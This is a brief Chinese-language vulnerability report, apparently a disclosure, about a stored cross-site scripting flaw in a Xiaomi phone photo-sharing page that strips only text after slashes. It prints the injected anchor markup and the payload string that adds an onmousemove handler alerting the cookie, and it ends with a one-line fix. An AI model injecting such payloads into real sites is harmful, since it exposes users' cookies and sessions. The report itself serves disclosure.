没有过滤单双引号和html标签,只是简单的把'/'或者'\'之后的字符串全部替换为空。
插入的目标区域在一个img里面,首先可以用各种on事件X掉,也可以写一个<script src=>,都无压力了,www.xuhantao.com,涛涛电脑知识网,就这样吧。
<a x="'','3866216808','')" onmousemove="javascript:alert(documents.cookie);" onclick="shareTSina('来我的“小米手机随手拍”摄影主页,看我用小米拍出的精彩作品。【阿哲哥】','')" href="javascript:void(0)">
')" onmousemove="javascript:alert(documents.cookie);" x="'
修复方案
像以前那样过滤